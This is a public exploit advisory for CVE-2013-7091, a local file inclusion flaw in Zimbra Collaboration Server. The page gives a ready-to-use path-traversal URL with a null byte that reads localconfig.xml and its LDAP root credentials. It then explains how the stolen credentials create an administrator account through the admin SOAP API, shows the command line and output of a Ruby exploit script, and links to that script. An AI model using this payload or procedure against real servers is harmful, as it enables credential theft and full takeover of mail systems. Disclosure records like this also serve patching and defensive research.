Zimbra 8.0.2 and 7.2.2 Collaboration Server LFI

2013-12-15 / 2013-12-23
Credit: rubina119
Risk: High
Local: No
Remote: Yes
CVE: CVE-2013-7091
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI # Date: 06 Dec 2013 # Exploit Author: rubina119 # Contact Email : rubina119[at]gmail.com # Vendor Homepage: http://www.zimbra.com/ # Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected, # Tested on: Centos(x), Ubuntu. # CVE : No CVE, no patch just 0Day # State : Critical # Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip ---------------Description----------------- This script exploits a Local File Inclusion in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz which allows us to see localconfig.xml that contains LDAP root credentials wich allow us to make requests in /service/admin/soap API with the stolen LDAP credentials to create user with administration privlegies and gain acces to the Administration Console. LFI is located at : /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin= ../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 Example : https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz? v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 or https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20 TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 ----------------Exploit----------------- Before use this exploit, target server must have admin console port open "7071" otherwise it won't work. use the exploit like this : ruby run.rb -t mail.example.com -u someuser -p Test123_23 [*] Looking if host is vuln.... [+] Host is vuln exploiting... [+] Obtaining Domain Name [+] Creating Account [+] Elevating Privileges [+] Login Credentials [*] Login URL : https://mail.example.com:7071/zimbraAdmin/ [*] Account : someuser@example.com [*] Password : Test123_23 [+] Successfully Exploited ! The number of servers vuln are huge like 80/100. This is only for educational purpouses.

References:

http://cxsecurity.com/issue/WLB-2013120155
http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
http://osvdb.org/100747


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top